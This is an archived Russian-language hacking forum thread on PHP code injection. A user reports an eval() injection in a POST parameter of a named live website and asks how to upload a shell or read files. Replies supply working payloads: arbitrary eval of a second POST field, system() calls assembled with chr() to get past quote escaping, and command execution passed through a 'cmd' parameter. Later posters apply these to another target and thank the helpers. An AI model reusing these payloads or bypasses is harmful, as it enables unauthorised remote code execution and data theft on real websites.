PDA

Просмотр полной версии : PHP Code Injection


assmaday
16.07.2013, 23:48
Нашел уязвимость в POST параметре option_id на сайте

http://www. shans.com. ua/

HackBar'ом передаю POST запрос

option_id={${$print(1)}}{${$print(1)}}{${$print(1) }}

option_id={${$phpinfo()}}

Скрипт отрабатывает.... Данные передаются в eval()

Кавычки экранируются.... Как залить шелл или прочитать файлы... base64_encode() не срабатывает... пытался залить через curl_init()....

Непойму почему данные передаются в "{}" без ";"

Вот так не работает {${$a=1; $print($a);}...

А так выводит данные - {${$a=1}}{${$print($a)}}

в гугле не нашел как выглядит данный скрипт...

Если есть чтото подобное киньте ссылку...

Expl0ited
17.07.2013, 07:42
option_id={${eval(stripslashes($_POST


))}}&code=print 'so good';

Nz2
19.09.2016, 10:08
Добырый день

есть пост запрос


submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system(ls))}\

Кавычки экранируются, подскажите как обойти? base64 не помогло

winstrool
22.09.2016, 00:29
↑ (https://antichat.live/posts/3992981/)
Добырый день
есть пост запрос

submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system(ls))}\

Кавычки экранируются, подскажите как обойти? base64 не помогло


функцией chr()


@print(system(CHR(108).CHR(115).CHR(32).CHR(45).CH R(108).CHR(97)))


или подстановкой пост параметра:


submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system($_POST[cmd]))}\&cmd=ls -la

Nz2
24.09.2016, 19:24
↑ (https://antichat.live/posts/3993922/)
функцией chr()

@print(system(CHR(108).CHR(115).CHR(32).CHR(45).CH R(108).CHR(97)))

или подстановкой пост параметра:

submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system($_POST[cmd]))}\&cmd=ls -la



Большое спасибо помогло!

GTAlex
26.10.2016, 13:39
Присоединяюсь -winstrool (https://antichat.live/members/33917/) спасибо ОГРОМНОЕ!

winstrool
26.10.2016, 15:56
Рад, что вы рады)